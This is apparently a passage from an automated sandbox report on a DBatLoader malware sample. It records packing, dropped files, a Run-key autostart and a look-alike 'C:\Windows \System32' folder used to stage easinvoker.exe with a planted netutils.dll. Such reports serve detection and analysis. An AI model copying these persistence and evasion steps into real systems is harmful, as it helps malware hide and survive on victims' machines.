dedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
                        Source: Binary string: CLBCatQ.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: oleaut32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: apphelp.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wuser32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: iertutil.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: crypt32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Yara detected DBatLoader
                        Source: Yara matchFile source: 0vJrK0NCd1.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.Elpuxpki.PIF.2e2056c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.0vJrK0NCd1.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.Elpuxpki.PIF.2e2056c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\Public\Libraries\Elpuxpki.PIF, type: DROPPED
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E36C48 push eax; ret 0_3_04E36C84
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E36C48 push eax; ret 0_3_04E36C84
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E36C48 push eax; ret 0_3_04E36C84
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx0_3_04E3BEA5
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3EFA0 push eax; ret 0_3_04E3EFDC
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3EFA0 push eax; ret 0_3_04E3EFDC
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E3EFA0 push eax; ret 0_3_04E3EFDC
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeCode function: 0_3_04E475D4 push eax; ret 0_3_04E47610
                        Source: C:\Windows \System32\easinvoker.exeCode function: 22_2_613CF021 pushfq ; iretd 22_2_613CF02A
                        Source: C:\Windows \System32\easinvoker.exeCode function: 22_2_613CFD00 pushfq ; ret 22_2_613CFD01
                        Source: C:\Windows \System32\easinvoker.exeCode function: 22_2_613D0DFE push rsp; iretd 22_2_613D0DFF
                        Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
                        Source: netutils.dll.0.drStatic PE information: section name: .....
                        Source: netutils.dll.0.drStatic PE information: section name: .....
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: ....
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: ....
                        Source: netutils.dll.0.drStatic PE information: section name: ....
                        Source: netutils.dll.0.drStatic PE information: section name: ......
                        Source: netutils.dll.0.drStatic PE information: section name: /4
                        Source: netutils.dll.0.drStatic PE information: section name: /19
                        Source: netutils.dll.0.drStatic PE information: section name: /31
                        Source: netutils.dll.0.drStatic PE information: section name: /45
                        Source: netutils.dll.0.drStatic PE information: section name: /57
                        Source: netutils.dll.0.drStatic PE information: section name: /70
                        Source: netutils.dll.0.drStatic PE information: section name: /81
                        Source: netutils.dll.0.drStatic PE information: section name: /92
                        Source: easinvoker.exe.17.drStatic PE information: section name: .imrsiv
                        Source: netutils.dll.19.drStatic PE information: section name: .....
                        Source: netutils.dll.19.drStatic PE information: section name: .....
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: ....
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: ....
                        Source: netutils.dll.19.drStatic PE information: section name: ....
                        Source: netutils.dll.19.drStatic PE information: section name: ......
                        Source: netutils.dll.19.drStatic PE information: section name: /4
                        Source: netutils.dll.19.drStatic PE information: section name: /19
                        Source: netutils.dll.19.drStatic PE information: section name: /31
                        Source: netutils.dll.19.drStatic PE information: section name: /45
                        Source: netutils.dll.19.drStatic PE information: section name: /57
                        Source: netutils.dll.19.drStatic PE information: section name: /70
                        Source: netutils.dll.19.drStatic PE information: section name: /81
                        Source: netutils.dll.19.drStatic PE information: section name: /92
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .....
                        Source: netutils.dll.0.drStatic PE information: real checksum: 0x25371 should be: 0x20ddd
                        Source: netutils.dll.19.drStatic PE information: real checksum: 0x25371 should be: 0x20ddd
                        Source: symsrv.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1f436
                        Source: Elpuxpki.PIF.0.drStatic PE information: real checksum: 0x0 should be: 0x12060e
                        Source: 0vJrK0NCd1.exeStatic PE information: real checksum: 0x0 should be: 0x12060e
                        Source: kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x43c42
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Drops executables to the windows directory (C:\Windows) and starts them
                        Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows \System32\easinvoker.exeJump to behavior
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Users\Public\Libraries\Elpuxpki.PIFJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Users\Public\Libraries\Elpuxpki.PIFJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)Jump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Program Files\Common Files\system\symsrv.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\easinvoker.exeJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\netutils.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\easinvoker.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Windows \System32\netutils.dllJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ElpuxpkiJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ElpuxpkiJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
